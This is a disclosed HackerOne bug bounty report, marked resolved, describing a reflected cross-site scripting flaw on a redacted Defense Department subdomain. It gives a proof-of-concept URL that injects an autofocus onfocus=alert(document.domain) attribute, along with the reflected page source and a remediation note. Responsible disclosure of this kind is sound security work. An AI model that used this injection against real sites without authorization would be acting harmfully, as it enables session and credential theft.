Reflected XSS at https://████████/███/...
Medium
Vulnerability Details
## Summary:
According to [DOD Websites](https://www.defense.gov/Resources/Military-Departments/DOD-Websites/), the [███████](http://██████████) is a potential in-scope target, and where I discovered an unauthenticated `GET` based reflected cross-site scripting vulnerability on the `██████████` subdomain.
## Steps to Reproduce:
Visit the following URL;
```
https://█████/█████/████████=%22%20autofocus%20onfocus=%22alert(document.domain)%22&Z_MODE=&Z_CALLER_URL=&Z_FORMROW=&Z_LONG_LIST=&Z_ISSUE_WAIT=
```
The following generated in the page source;
```
███████ VALUE="" autofocus onfocus="alert(document.domain)"%">
```
You will see that a pop-up appears, demonstrating that the JavaScript was executed successfully.
## Recommendations:
Sanitise any user input and check any other potential vulnerable parameters.
## Impact
A cross-site scripting vulnerability allows an attacker to embed malicious code into a URL of a vulnerable page, which is then executed when a victim views the page and can be used to gain account credentials by stealing cookies or modify the destination page to perform malicious actions.
Actions
View on HackerOneReport Stats
- Report ID: 976137
- State: Closed
- Substate: resolved
- Upvotes: 9